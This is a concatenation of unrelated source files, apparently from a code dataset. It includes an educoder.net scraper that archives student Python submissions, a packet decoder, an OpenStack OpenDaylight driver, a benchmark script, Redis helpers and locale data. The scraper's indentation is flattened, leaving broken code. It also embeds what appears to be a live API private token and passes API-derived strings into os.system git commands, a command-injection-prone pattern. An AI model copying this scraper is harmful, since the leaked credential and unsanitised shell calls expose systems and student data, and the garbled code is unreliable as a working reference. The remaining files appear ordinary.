req = urllib.request.Request(url)
res_data = urllib.request.urlopen(req)
res = json.loads(res_data.read())
identifier = res.get("identifier","")
#print 'identifier',identifier
                    #### use the identifier as the submission_id ####
####code###########
path = cha.path
this_amount += self.get_code(identifier,user_id,path)
# #print self.user_ids
    def git_clone(self,dir_name,git_url): # clone from git into the local code directory
#print git_url
os.chdir(dir_name)
git.Git().clone(git_url)
    def add_dir(self,dir_name): # create the directory if it does not exist
isExists=os.path.exists(dir_name)
if not isExists:
os.makedirs(dir_name)
    def get_code(self,identifier,user_id,path): # download the code locally
amount = 0
url = 'https://www.educoder.net/api/v1/sources/%s/game_detail?private_token=<KEY>' %identifier
req = urllib.request.Request(url)
res_data = urllib.request.urlopen(req)
res = json.loads(res_data.read())
code_info = res
#print (res)
id = res.get("id","")
cid = res.get("challenge_id","")
commit_count = res.get("commit_count",0)
right = res.get("right","False")
final_score = res.get("final_score",0)
git_url = res.get("git_url","")
commit_status = res.get("commit_status",[])
status = '0'
if commit_count == 0 :
return amount
#print 'right:',right
#print 'commmit_count',commit_count
dir_name = '/home/nlsde/educoder/code/%s/%s' %(self.id,user_id)
if git_url:
self.add_dir(dir_name)
try:
self.git_clone(dir_name,git_url)
except:
pass
git_name = '%s/%s' %(dir_name,git_url.split('/')[-1].replace('.git',''))
os.chdir(git_name)
#print 'git_name',git_name
            ###### write the first submission to the database ######
submission_id = '%s-0' %identifier
code_dir = '%s/%s' %(git_name,path)
#time.sleep(1)
code_content = open(code_dir,'r',encoding='UTF-8').read()
code_r = chuli(code_content)
shixun_id = self.id
user_id = user_id
commit_count = commit_count
            commit_number = 0 ### which attempt (submission index)
insert_info_root = "INSERT INTO \"submission_submission_python\" (shixun_id, challenge_id, student_id, submission_time, submission_count,submission_id,code,result,w_code,code_r) VALUES (%s,%s, %s, %s, %s,%s,%s,%s,'0',%s)"
list_tmp = [shixun_id, cid, user_id,commit_number,commit_count,submission_id,code_content,right,code_r]
result = cursor.execute(insert_info_root, list_tmp)
print(insert_info_root)
db.commit()
amount += 1
#print submission_id
#print code_dir
#print code_content
            ###### if there was only a single commit ######
if commit_count == 1:
# print (amount)
return amount
            ##### extract the commit times from the git log #####
os.system('git log > log')
git_log = open('log','r', encoding='UTF-8').readlines()
p1 = r'Date.*800'
pattern = re.compile(p1)
date_all = []
for line in git_log:
this = pattern.findall(line)
if this:
date_str = this[0]
date_str = date_str.replace('Date:','').replace('+0800','').strip()
date = datetime.datetime.strptime(date_str,"%a %b %d %H:%M:%S %Y")
date_all.append(date)
            ###### get the commit_id ######
#commit_id_final = 'git log head -n 1 > now.txt'
for i,item in enumerate(commit_status):
if i == 0:
continue
submission_id2 = "%s-%s" %(identifier,str(i))
commit_time = item.get("commit_time","")
#print commit_time
#"2018-10-18T18:33:41+08:00",
commit_id = ''
if commit_time:
this_time = commit_time.strip().split('+')[0]
now = datetime.datetime.strptime(this_time,"%Y-%m-%dT%H:%M:%S")
last_date = date_all[0]
this_date = datetime.datetime.strftime(last_date,"%a %b %d %H:%M:%S %Y")
for git_date in date_all:
if last_date > now and git_date < now:
this_date = datetime.datetime.strftime(last_date,"%a %b %d %H:%M:%S %Y")
break
if last_date < now:
this_date = datetime.datetime.strftime(last_date,"%a %b %d %H:%M:%S %Y")
last_date = git_date
#print date_all[0]
mingling = 'git log | grep -B 2 "%s" | head -n 1 > now.txt' %this_date
#print mingling
return_mingling = os.system(mingling)
all_strs = open('now.txt','r').read()
if all_strs:
commit_id = all_strs.replace("\n","").split(" ")[-1]
#print 'commit_id',commit_id
                #### write intermediate submissions to the database ####
if commit_id:
mingling2 = 'git show %s:%s >code.txt' %(commit_id,path)
#print mingling2
os.system(mingling2)
#code_dir2 = '%s/%s' %(git_name,path)
code_content2 = open('code.txt','r',encoding='UTF-8').read()
if code_content2 == code_content:
                        #print 'identical'
continue
#print submission_id2
#print code_dir
#print code_content2
shixun_id2 = self.id
user_id2 = user_id
commit_count2 = commit_count
                    commit_number2 = i ### which attempt (submission index)
code_content=code_content2
code_r = chuli(code_content)
amount += 1
                    right = 'false' # intermediate results are marked false
insert_info_root2 = "INSERT INTO \"submission_submission_python\" (shixun_id, challenge_id, student_id, submission_time, submission_count,submission_id,code,result,w_code,code_r) VALUES (%s, %s, %s, %s, %s,%s,%s,%s,'0',%s)"
list_tmp2 = [shixun_id2, cid,user_id2,commit_number2,commit_count2,submission_id2,code_content,right,code_r]
cursor.execute(insert_info_root2, list_tmp2)
db.commit()
return amount
######################################
    def get_challenge(self,): # get all challenges (levels) under this shixun
url = 'https://www.educoder.net/api/v1/sources/%s/shixun_challenges?private_token=<KEY>' %self.identifier
        # concrete example: see https://www.educoder.net/api/v1/sources/zlg2nmcf/shixun_challenges?private_token=<KEY>
req = urllib.request.Request(url)
res_data = urllib.request.urlopen(req)
res = json.loads(res_data.read())
self.challenge = []
for item in res:
id = item.get("id","")
name = item.get("name","")
path = item.get("path","")
ins = item.get("sets",[]) ####测试样例 格式[{"input":"","output":""}]
answer = item.get("answer","")
answer = chuli(answer)
content = item.get("task_pass","") ######题目内容
#######################chanlleng存入数据库#################################
#print(answer1.encode('utf-8'))
#print(answer.encode('utf-8'))
try:
entryfun = content.split('def')[1].split('(')[0].strip()
if len(entryfun)>10:
entryfun = 'main_none'
except Exception:
entryfun = 'main_none'
insert_info_root = "INSERT INTO \"submission_challenge\" (challenge_id, challenge_name, path, ins, answer,content,entryfun,children_num,level,parent_id,shixun_id,identifier) VALUES (%s, %s, %s, %s,%s,%s,%s,'0','0','0',%s,%s)"
list_tmp = [id, name,path,str(ins),answer,content,entryfun,self.id,self.identifier]
# print(str(ins))
cursor.execute(insert_info_root, list_tmp)
db.commit()
if id:
s_c = Challenge(id,self.id,name,path)
                #s_c.get_student_challenge() # fetch the challenges students have completed
#print s_c.id
#print s_c.name
self.challenge.append(s_c)
print(s_c)
#break
def __str__(self,):
result = [self.id,self.name,self.identifier]
result = [str(i).encode("ascii") for i in result]
return str(result)
class Challenge(object):
def __init__(self,id,shixun_id,name,path):
self.id = id
self.shixun_id = shixun_id
self.name = name
self.path = path
self.submission = {}
    def git_clone(self,dir_name,git_url): # clone from git into the local code directory
#print git_url
os.chdir(dir_name)
git.Git().clone(git_url)
    def get_code(self,identifier,result): # download the code locally
user_id = result["user_id"]
url = 'https://www.educoder.net/api/v1/sources/%s/game_detail?private_token=<KEY>' %identifier
req = urllib.request.Request(url)
res_data = urllib.request.urlopen(req)
res = json.loads(res_data.read())
code_info = res
##print res
id = res.get("id","")
commit_count = res.get("commit_count",0)
right = res.get("right","false")
final_score = res.get("final_score",0)
git_url = res.get("git_url","")
commit_status = res.get("commit_status",[])
if right == "false":
return
#print 'right',right
#print 'commmit_count',commit_count
if right == 'true':
status = '1'
dir_name = '/home/nlsde/educoder/code/%s/%s' %(self.id,user_id)
if git_url:
self.add_dir(dir_name)
try:
self.git_clone(dir_name,git_url)
except:
pass
for i,item in enumerate(commit_status):
submission_id = "%s%s" %(id,str(i))
##print item
    def add_dir(self,dir_name): # create the directory if it does not exist
isExists=os.path.exists(dir_name)
if not isExists:
os.makedirs(dir_name)
def get_student_challenge(self,date='20190102'):
#url = 'https://www.educoder.net/api/v1/sources/lrmbky4hjp9a/game_detail?private_token=<KEY>'
url = 'https://www.educoder.net/api/v1/sources/games?time=%s&private_token=<KEY>' %date
req = urllib.request.Request(url)
res_data = urllib.request.urlopen(req)
res = json.loads(res_data.read())
self.student_challenge = {}
for item in res:
item = item['game']
user_id = item.get("user_id","")
identifier = item.get("identifier","")
myshixun_id = item.get("myshixun_id","")
if user_id:
result = {}
result["user_id"] = user_id
result["myshixun_id"] = myshixun_id
self.student_challenge[identifier] = result
code_info = self.get_code(identifier,result)
#result["code"] = code_info
##print result
#### execution starts from here ####
def chuli(code):
code = code.replace("'",'"')
date_all = re.findall(r"[(]((.|\n)*?)[)]", code)
for item in date_all:
item = item[0]
item2 = item.replace("\n","").replace("\t","")
code = code.replace(item,item2)
#code = code.decode("utf8")
start = ' '
name = 'main_none'
try:
entryfun = code.split('def')[1].split('(')[0].strip()
if len(entryfun) > 10:
entryfun = 'main_none'
except:
entryfun = 'main_none'
if entryfun == 'main_none' or entryfun == 'print_':
result_code = ''
lines = code.split('\n')
hanshu = 'def %s():\n' %name
end = '%s()\n' %name
tag = -1
if 'import' not in code or 'coding' not in code:
tag = 1
for line in lines:
if line.strip() == "```python":
continue
regex = u"[\u4e00-\u9fa5]+"
res = re.findall(regex, line)
for item in res:
                line = line.replace(item,'#') # replace Chinese characters with '#'
            if line.strip().startswith('#'): # skip comment lines
continue
if line.startswith('import') or 'coding'in line or line.startswith('from'):
line = line + '\n'
tag = 1
elif tag == 1:
result_code += hanshu
line = start + line + '\n'
tag = 0
elif tag == -1:
continue
elif tag == 0:
line = start + line + '\n'
result_code += line
result_code += end
else:
result_code = ''
lines = code.split('\n')
for line in lines:
regex = u"[\u4e00-\u9fa5]+"
res = re.findall(regex, line)
for item in res:
                line = line.replace(item,'#') # replace Chinese characters with '#'
if line.startswith('#'):
continue
result_code += line+'\n'
return result_code
#identifiers = ['q4ixftoz']
identifiers = ['ku6lva8t', 'nfypjxhl', 'vff6ljxc', 'k4wg9b32', 'pw53ln4m', 'afvk9r35', 'q4ixftoz', 'ral8fjw9', '89zfsjbp', 'no9uv3g2', 'cztux23y', '4bflgcs8', '6w2xmtls', 'o4xa93mc', 'uctzevfx', 'wokspmut', 'pvwltoq8', 'i2vu5jnl', 'gr7j3apk', 'jk35u2fb', 'atbm74vp', 'vxbpihfe', 'fhc7p56a', 'zekp6f7u', '2slytwug', 'pbx7wzu8', 'fvlehyxp', 'mhbl84nq', 'ftqxgcol', 'h2rugyfp', 'igbc4rtw', 'oatsh64e', 'jxyng672', 'xzbft8gv', '7rnalquk', '69lkjf4g', 'm6nc38so', '9boaulx4', 'ivj49blf', 'mfugx52o', '67nayvtg', 'f39hiscw', 'c6k5i82o', '2y8t594n', 'nbixuzkf', '3bkzvpw7']
def download_shixun(date):
url = 'https://www.educoder.net/api/v1/sources/shixun_index?time=%s&private_token=hriEn3UwXfJs3PmyXnSG' %date
req = urllib.request.Request(url)
res_data = urllib.request.urlopen(req)
res = json.loads(res_data.read())
##print len(res)
for item in res:
item = item['shixun']
name = item.get("name","")
id = item.get("id","")
identifier = item.get("identifier","")
if id and 'Python' in name:
shixun = Shixun(id,name,identifier)
shixun.get_shixun()
#print shixun.name
#print shixun.identifier
for this_identifier in identifiers:
if identifier == this_identifier:
shixun.get_challenge()
shixun.get_myshixun()
download_shixun('20190102')
db.close()
|
StarcoderdataPython
|
1765746
|
import sys
from functools import reduce
def char_to_bin(c):
return "{0:04b}".format(int(c, 16))
def hex_to_bits(hex_string):
return ''.join(char_to_bin(c) for c in hex_string)
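# Added note: e.g. hex_to_bits("D2") == "11010010".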
def decode(hex_string):
versions = []
packet = hex_to_bits(hex_string)
def process_packet(i):
def read(n):
nonlocal i
res = int(packet[i:i+n], 2)
i += n
return res
version = read(3)
versions.append(version)
type_id = read(3)
if type_id == 4:
literal = 0
not_last = True
while not_last:
data = read(5)
not_last = data & 0b10000
literal = (literal << 4) | (data & 0b01111)
return i, literal
else:
length_type_id = read(1)
values = []
if length_type_id == 0:
total_len = read(15)
j = i
i += total_len
while j < i:
j, val = process_packet(j)
values.append(val)
else:
num_packets = read(11)
for _ in range(num_packets):
i, val = process_packet(i)
values.append(val)
res = None
if type_id == 0:
res = sum(values)
elif type_id == 1:
res = reduce(lambda x,y: x*y, values)
elif type_id == 2:
res = min(values)
elif type_id == 3:
res = max(values)
elif type_id == 5:
res = int(values[0] > values[1])
elif type_id == 6:
res = int(values[0] < values[1])
elif type_id == 7:
res = int(values[0] == values[1])
return i, res
_, res = process_packet(0)
return sum(versions), res
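# Added note: the well-known single-literal example packet for this decoder.
# decode("D2FE28") returns (6, 2021): version sum 6 and literal value 2021.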
def main(input_file):
with open(input_file, 'r') as f:
hex_string = f.read().strip()
val1, val2 = decode(hex_string)
print('Part 1:', val1)
print('Part 2:', val2)
if __name__ == '__main__':
input_file = sys.argv[-1] if len(sys.argv) > 1 else 'input.txt'
main(input_file)
|
StarcoderdataPython
|
3313187
|
# Copyright (c) 2013-2014 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
import six
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import excutils
import requests
from neutron.common import exceptions as n_exc
from neutron.common import utils
from neutron import context
from neutron.extensions import securitygroup as sg
from neutron.plugins.ml2 import driver_context
from networking_odl.common import callback as odl_call
from networking_odl.common import client as odl_client
from networking_odl.common import constants as odl_const
from networking_odl.common import utils as odl_utils
from networking_odl.openstack.common._i18n import _LE
LOG = logging.getLogger(__name__)
not_found_exception_map = {odl_const.ODL_NETWORKS: n_exc.NetworkNotFound,
odl_const.ODL_SUBNETS: n_exc.SubnetNotFound,
odl_const.ODL_PORTS: n_exc.PortNotFound,
odl_const.ODL_SGS: sg.SecurityGroupNotFound,
odl_const.ODL_SG_RULES:
sg.SecurityGroupRuleNotFound}
@six.add_metaclass(abc.ABCMeta)
class ResourceFilterBase(object):
@staticmethod
@abc.abstractmethod
def filter_create_attributes(resource, context):
pass
@staticmethod
@abc.abstractmethod
def filter_update_attributes(resource, context):
pass
@staticmethod
@abc.abstractmethod
def filter_create_attributes_with_plugin(resource, plugin, dbcontext):
pass
class NetworkFilter(ResourceFilterBase):
@staticmethod
def filter_create_attributes(network, context):
"""Filter out network attributes not required for a create."""
odl_utils.try_del(network, ['status', 'subnets'])
@staticmethod
def filter_update_attributes(network, context):
"""Filter out network attributes for an update operation."""
odl_utils.try_del(network, ['id', 'status', 'subnets', 'tenant_id'])
@classmethod
def filter_create_attributes_with_plugin(cls, network, plugin, dbcontext):
context = driver_context.NetworkContext(plugin, dbcontext, network)
cls.filter_create_attributes(network, context)
class SubnetFilter(ResourceFilterBase):
@staticmethod
def filter_create_attributes(subnet, context):
"""Filter out subnet attributes not required for a create."""
pass
@staticmethod
def filter_update_attributes(subnet, context):
"""Filter out subnet attributes for an update operation."""
odl_utils.try_del(subnet, ['id', 'network_id', 'ip_version', 'cidr',
'allocation_pools', 'tenant_id'])
@classmethod
def filter_create_attributes_with_plugin(cls, subnet, plugin, dbcontext):
context = driver_context.SubnetContext(subnet, plugin, dbcontext)
cls.filter_create_attributes(subnet, context)
class PortFilter(ResourceFilterBase):
@staticmethod
def _add_security_groups(port, context):
"""Populate the 'security_groups' field with entire records."""
dbcontext = context._plugin_context
groups = [context._plugin.get_security_group(dbcontext, sg)
for sg in port['security_groups']]
port['security_groups'] = groups
@classmethod
def filter_create_attributes(cls, port, context):
"""Filter out port attributes not required for a create."""
cls._add_security_groups(port, context)
# TODO(kmestery): Converting to uppercase due to ODL bug
# https://bugs.opendaylight.org/show_bug.cgi?id=477
port['mac_address'] = port['mac_address'].upper()
odl_utils.try_del(port, ['status'])
# NOTE(yamahata): work around for port creation for router
# tenant_id=''(empty string) is passed when port is created
# by l3 plugin internally for router.
# On the other hand, ODL doesn't accept empty string for tenant_id.
# In that case, deduce tenant_id from network_id for now.
# Right fix: modify Neutron so that don't allow empty string
# for tenant_id even for port for internal use.
# TODO(yamahata): eliminate this work around when neutron side
# is fixed
# assert port['tenant_id'] != ''
if port['tenant_id'] == '':
LOG.debug('empty string was passed for tenant_id: %s(port)', port)
port['tenant_id'] = context._network_context._network['tenant_id']
@classmethod
def filter_update_attributes(cls, port, context):
"""Filter out port attributes for an update operation."""
cls._add_security_groups(port, context)
odl_utils.try_del(port, ['network_id', 'id', 'status', 'mac_address',
'tenant_id', 'fixed_ips'])
@classmethod
def filter_create_attributes_with_plugin(cls, port, plugin, dbcontext):
network = plugin.get_network(dbcontext, port['network_id'])
# TODO(yamahata): port binding
binding = {}
context = driver_context.PortContext(
plugin, dbcontext, port, network, binding, None)
cls.filter_create_attributes(port, context)
class SecurityGroupFilter(ResourceFilterBase):
@staticmethod
def filter_create_attributes(sg, context):
"""Filter out security-group attributes not required for a create."""
pass
@staticmethod
def filter_update_attributes(sg, context):
"""Filter out security-group attributes for an update operation."""
pass
@staticmethod
def filter_create_attributes_with_plugin(sg, plugin, dbcontext):
pass
class SecurityGroupRuleFilter(ResourceFilterBase):
@staticmethod
def filter_create_attributes(sg_rule, context):
"""Filter out sg-rule attributes not required for a create."""
pass
@staticmethod
def filter_update_attributes(sg_rule, context):
"""Filter out sg-rule attributes for an update operation."""
pass
@staticmethod
def filter_create_attributes_with_plugin(sg_rule, plugin, dbcontext):
pass
class OpenDaylightDriver(object):
"""OpenDaylight Python Driver for Neutron.
This code is the backend implementation for the OpenDaylight ML2
MechanismDriver for OpenStack Neutron.
"""
FILTER_MAP = {
odl_const.ODL_NETWORKS: NetworkFilter,
odl_const.ODL_SUBNETS: SubnetFilter,
odl_const.ODL_PORTS: PortFilter,
odl_const.ODL_SGS: SecurityGroupFilter,
odl_const.ODL_SG_RULES: SecurityGroupRuleFilter,
}
out_of_sync = True
def __init__(self):
LOG.debug("Initializing OpenDaylight ML2 driver")
self.client = odl_client.OpenDaylightRestClient(
cfg.CONF.ml2_odl.url,
cfg.CONF.ml2_odl.username,
cfg.CONF.ml2_odl.password,
cfg.CONF.ml2_odl.timeout
)
self.sec_handler = odl_call.OdlSecurityGroupsHandler(self)
def synchronize(self, operation, object_type, context):
"""Synchronize ODL with Neutron following a configuration change."""
if self.out_of_sync:
self.sync_full(context._plugin)
else:
self.sync_single_resource(operation, object_type, context)
def sync_resources(self, plugin, dbcontext, collection_name):
"""Sync objects from Neutron over to OpenDaylight.
This will handle syncing networks, subnets, and ports from Neutron to
OpenDaylight. It also filters out the requisite items which are not
valid for create API operations.
"""
filter_cls = self.FILTER_MAP[collection_name]
to_be_synced = []
obj_getter = getattr(plugin, 'get_%s' % collection_name)
if collection_name == odl_const.ODL_SGS:
resources = obj_getter(dbcontext, default_sg=True)
else:
resources = obj_getter(dbcontext)
for resource in resources:
try:
# Convert underscores to dashes in the URL for ODL
collection_name_url = collection_name.replace('_', '-')
urlpath = collection_name_url + '/' + resource['id']
self.client.sendjson('get', urlpath, None)
except requests.exceptions.HTTPError as e:
with excutils.save_and_reraise_exception() as ctx:
if e.response.status_code == requests.codes.not_found:
filter_cls.filter_create_attributes_with_plugin(
resource, plugin, dbcontext)
to_be_synced.append(resource)
ctx.reraise = False
else:
# TODO(yamahata): compare result with resource.
# If they don't match, update it below
pass
key = collection_name[:-1] if len(to_be_synced) == 1 else (
collection_name)
# Convert underscores to dashes in the URL for ODL
collection_name_url = collection_name.replace('_', '-')
self.client.sendjson('post', collection_name_url, {key: to_be_synced})
# https://bugs.launchpad.net/networking-odl/+bug/1371115
        # TODO(yamahata): update resources with unsynced attributes
        # TODO(yamahata): find dangling ODL resource that was deleted in
# neutron db
@utils.synchronized('odl-sync-full')
def sync_full(self, plugin):
"""Resync the entire database to ODL.
Transition to the in-sync state on success.
Note: we only allow a single thread in here at a time.
"""
if not self.out_of_sync:
return
dbcontext = context.get_admin_context()
for collection_name in [odl_const.ODL_NETWORKS,
odl_const.ODL_SUBNETS,
odl_const.ODL_PORTS,
odl_const.ODL_SGS,
odl_const.ODL_SG_RULES]:
self.sync_resources(plugin, dbcontext, collection_name)
self.out_of_sync = False
def sync_single_resource(self, operation, object_type, context):
"""Sync over a single resource from Neutron to OpenDaylight.
Handle syncing a single operation over to OpenDaylight, and correctly
filter attributes out which are not required for the requisite
operation (create or update) being handled.
"""
# Convert underscores to dashes in the URL for ODL
object_type_url = object_type.replace('_', '-')
try:
obj_id = context.current['id']
if operation == odl_const.ODL_DELETE:
self.out_of_sync |= not self.client.try_delete(
object_type_url + '/' + obj_id)
else:
filter_cls = self.FILTER_MAP[object_type]
if operation == odl_const.ODL_CREATE:
urlpath = object_type_url
method = 'post'
attr_filter = filter_cls.filter_create_attributes
elif operation == odl_const.ODL_UPDATE:
urlpath = object_type_url + '/' + obj_id
method = 'put'
attr_filter = filter_cls.filter_update_attributes
resource = context.current.copy()
attr_filter(resource, context)
self.client.sendjson(method, urlpath,
{object_type_url[:-1]: resource})
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_LE("Unable to perform %(operation)s on "
"%(object_type)s %(object_id)s"),
{'operation': operation,
'object_type': object_type,
'object_id': obj_id})
self.out_of_sync = True
def sync_from_callback(self, operation, object_type, res_id,
resource_dict):
try:
if operation == odl_const.ODL_DELETE:
self.out_of_sync |= not self.client.try_delete(
object_type + '/' + res_id)
else:
if operation == odl_const.ODL_CREATE:
urlpath = object_type
method = 'post'
elif operation == odl_const.ODL_UPDATE:
urlpath = object_type + '/' + res_id
method = 'put'
self.client.sendjson(method, urlpath, resource_dict)
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_LE("Unable to perform %(operation)s on "
"%(object_type)s %(res_id)s %(resource_dict)s"),
{'operation': operation,
'object_type': object_type,
'res_id': res_id,
'resource_dict': resource_dict})
self.out_of_sync = True
|
StarcoderdataPython
|
3376461
|
<gh_stars>1-10
#!/usr/bin/env python
# -*- coding: utf-8 -*-
def check(height):
if height >= 160:
return "John"
else:
return "Michel"
name = "who"
print(name)
h = 170
name = check(h)
print(name)
|
StarcoderdataPython
|
119970
|
<gh_stars>1-10
#! /usr/bin/env python3
import os
import string
import time
from pathlib import Path
from subprocess import Popen, DEVNULL
def start_openocd():
cmd = ["openocd", "-f", "interface/stlink-v2-1.cfg", "-f", "target/stm32f3x.cfg"]
proc = Popen(cmd, stdout=DEVNULL, stderr=DEVNULL)
time.sleep(1)
return proc
def run_bench(name, size):
output_file = Path("itm.txt")
output_file.touch(exist_ok=False)
features = f"{name},n-{size}"
cmd = ["cargo", "run", "--release", "--features", features]
proc = Popen(cmd, stdout=DEVNULL, stderr=DEVNULL)
try:
output = wait_for_file(output_file)
finally:
proc.terminate()
output_file.unlink()
cycles = parse_output(output)
print(f"({name}, {size}): {cycles}")
def wait_for_file(path):
while True:
contents = path.read_bytes()
if contents:
return contents
time.sleep(0.1)
def parse_output(output):
chars = (chr(b) for b in output)
printable = (c for c in chars if c in string.printable)
return "".join(printable)
def run_benches():
for i in range(2, 13):
run_bench("microfft-c", 2 ** i)
for i in range(2, 13):
run_bench("microfft-r", 2 ** i)
for i in range(2, 10):
run_bench("fourier-c", 2 ** i)
def main():
bench_path = Path(__file__).resolve().parent
os.chdir(bench_path)
openocd = start_openocd()
try:
run_benches()
finally:
        openocd.terminate()
if __name__ == "__main__":
main()
|
StarcoderdataPython
|
188391
|
# coding: utf-8
import os
import glob
import time
import json
from copy import copy
import redis
from lib.tools.s_logger import S_logger
import config as CONF
class Tools_data:
# pool
def redis_pool(self, SCRenv):
try:
pool = redis.ConnectionPool(
host=CONF.REDIS['address'],
port=CONF.REDIS['port'],
db=CONF.REDIS['db'],
decode_responses=True)
rp = redis.StrictRedis(connection_pool=pool)
rp.keys()
except:
#SCRenv['log'].output("Boot to journal mode.", level='DEBUG', SCRenv={'module':'SCR'})
return 'journal'
#SCRenv['log'].output("Boot to redis mode.", level='DEBUG', SCRenv={'module':'SCR'})
return pool
def redis_con(self):
r = redis.StrictRedis(
host=CONF.REDIS['address'],
port=CONF.REDIS['port'],
db=CONF.REDIS['db'],
decode_responses=True)
return r
    # search and get data
# return <jsonstr>
def get_data(self, SCRfield, SCRenv, ty):
# field data is only journal
if ty == 'fi':
if(os.path.exists('journal/scr_f')):
with open('journal/scr_f') as f:
data_str = f.read()
else:
return False
else:
key = '_'.join(['scr', str(SCRfield['state']['fid']), str(SCRfield['state']['myid']), ty])
if type(SCRenv['pool']) == redis.connection.ConnectionPool:
re = redis.StrictRedis(connection_pool=SCRenv['pool'])
if(re.exists(key)):
if(ty == 'sp'):
return re.smembers(key)
else:
data_str = re.get(key)
else:
if(ty == 'sp'):
return set([])
return []
if SCRenv['pool'] == 'journal':
if(os.path.exists('journal/' + key)):
with open('journal/' + key) as f:
data_str = f.read()
else:
return False
#print(data_str)
de = json.JSONDecoder()
return de.decode(data_str.replace('\'','\"'))
def pop_receive_data(self, SCRfield, SCRenv):
data_list = []
if type(SCRenv['pool']) == redis.connection.ConnectionPool:
key = '_'.join(['scr', str(SCRfield['state']['fid']), str(SCRfield['state']['myid']), 're'])
try:
re = redis.StrictRedis(connection_pool=SCRenv['pool'])
if(0 < re.llen(key)):
low = re.llen(key)
data_list += re.lrange(key, 0, low - 1)
re.ltrim(key, low, -1)
except:
#SCRenv['log'].output("failed receive.", level='DEBUG', SCRenv=SCRenv)
return False
re_files = glob.glob('journal/*_re_*')
if(len(re_files) != 0):
try:
for ref in re_files:
with open(ref) as f:
data_str = f.read()
data_list += data_str.split('\n')
os.remove(ref)
except:
#SCRenv['log'].output("failed receive from journal.", level='DEBUG', SCRenv=SCRenv)
return False
if(len(data_list) == 0):
return False
de = json.JSONDecoder()
data_dic_list = []
for re in data_list:
data_dic_list.append(de.decode(re.replace('\'','\"')))
return data_dic_list
    # create the specified data
# return <bool>
def create_data(self, SCRfield, SCRenv, data, ty):
if ty == 'fi':
with open('journal/scr_f', 'w') as f:
f.write(json.dumps(data))
return True
else:
key = '_'.join(['scr', str(SCRfield['state']['fid']), str(SCRfield['state']['myid']), ty])
c_data = copy(data)
if(ty == 'en'):
del c_data['pool']
del c_data['i']
del c_data['log']
if(type(SCRenv['pool']) == redis.connection.ConnectionPool):
c_data['pool'] = 'redis_pool'
else:
c_data['pool'] = 'journal'
if type(SCRenv['pool']) == redis.connection.ConnectionPool:
try:
re = redis.StrictRedis(connection_pool=SCRenv['pool'])
re.set(key, json.dumps(c_data))
except:
SCRenv['log'].output(lv='DEBUG', log="failed set " + key + " data.")
return False
elif SCRenv['pool'] == 'journal':
try:
if(os.path.exists('journal/' + key)):
os.remove('journal/' + key)
with open('journal/' + key, 'w') as f:
f.write(json.dumps(c_data))
except:
#SCRenv['log'].output("failed write " + key + " journal data.", level='DEBUG', SCRenv=SCRenv)
return False
return True
    # delete the specified data
# return <bool>
def truncate_data(self, SCRfield, SCRenv, ty):
key = '_'.join(['scr', str(SCRfield['state']['fid']), str(SCRfield['state']['myid']), ty])
if type(SCRenv['pool']) == redis.connection.ConnectionPool:
try:
re = redis.StrictRedis(connection_pool=SCRenv['pool'])
re.delete(key)
except:
#SCRenv['log'].output("failed truncate " + key + ".", level='DEBUG', SCRenv=SCRenv)
return False
elif SCRenv['pool'] == 'journal':
try:
os.remove('journal/' + key)
except:
#SCRenv['log'].output("failed truncate " + key + ".", level='DEBUG', SCRenv=SCRenv)
return False
return True
def insert_spe(self, SCRfield, SCRenv, data):
key = '_'.join(['scr', str(SCRfield['state']['fid']), str(SCRfield['state']['myid']), 'sp'])
if type(SCRenv['pool']) == redis.connection.ConnectionPool:
try:
re = redis.StrictRedis(connection_pool=SCRenv['pool'])
return re.sadd(key, data)
except:
#SCRenv['log'].output("failed truncate " + key + ".", level='DEBUG', SCRenv=SCRenv)
return False
def insert_receive(self, SCRfield, rc, receive):
key = '_'.join(['scr', str(SCRfield['state']['fid']), str(SCRfield['state']['myid']), 're'])
rc.rpush(key, json.dumps(receive))
|
StarcoderdataPython
|
3364892
|
<reponame>bcgov/wps-api
""" Code common to app.models.fetch """
from enum import Enum
class ModelEnum(str, Enum):
""" Enumerator for different kinds of supported weather models """
GDPS = "GDPS"
|
StarcoderdataPython
|
1612698
|
# -*- coding: utf-8 -*-
info = {
"name": "kde",
"date_order": "DMY",
"january": [
"mwedi ntandi",
"jan"
],
"february": [
"mwedi wa pili",
"feb"
],
"march": [
"mwedi wa tatu",
"mac"
],
"april": [
"mwedi wa nchechi",
"apr"
],
"may": [
"mwedi wa nnyano",
"mei"
],
"june": [
"mwedi wa nnyano na umo",
"jun"
],
"july": [
"mwedi wa nnyano na mivili",
"jul"
],
"august": [
"mwedi wa nnyano na mitatu",
"ago"
],
"september": [
"mwedi wa nnyano na nchechi",
"sep"
],
"october": [
"mwedi wa nnyano na nnyano",
"okt"
],
"november": [
"mwedi wa nnyano na nnyano na u",
"nov"
],
"december": [
"mwedi wa nnyano na nnyano na m",
"des"
],
"monday": [
"liduva lyatatu",
"ll3"
],
"tuesday": [
"liduva lyanchechi",
"ll4"
],
"wednesday": [
"liduva lyannyano",
"ll5"
],
"thursday": [
"liduva lyannyano na linji",
"ll6"
],
"friday": [
"liduva lyannyano na mavili",
"ll7"
],
"saturday": [
"liduva litandi",
"ll1"
],
"sunday": [
"liduva lyapili",
"ll2"
],
"am": [
"muhi"
],
"pm": [
"chilo"
],
"year": [
"mwaka"
],
"month": [
"mwedi"
],
"week": [
"lijuma"
],
"day": [
"lihiku"
],
"hour": [
"saa"
],
"minute": [
"dakika"
],
"second": [
"sekunde"
],
"relative-type": {
"1 year ago": [
"last year"
],
"0 year ago": [
"this year"
],
"in 1 year": [
"next year"
],
"1 month ago": [
"last month"
],
"0 month ago": [
"this month"
],
"in 1 month": [
"next month"
],
"1 week ago": [
"last week"
],
"0 week ago": [
"this week"
],
"in 1 week": [
"next week"
],
"1 day ago": [
"lido"
],
"0 day ago": [
"nelo"
],
"in 1 day": [
"nundu"
],
"0 hour ago": [
"this hour"
],
"0 minute ago": [
"this minute"
],
"0 second ago": [
"now"
]
},
"locale_specific": {},
"skip": [
" ",
".",
",",
";",
"-",
"/",
"'",
"|",
"@",
"[",
"]",
","
]
}
|
StarcoderdataPython
|
1660799
|
<gh_stars>1-10
#!/usr/bin/env python
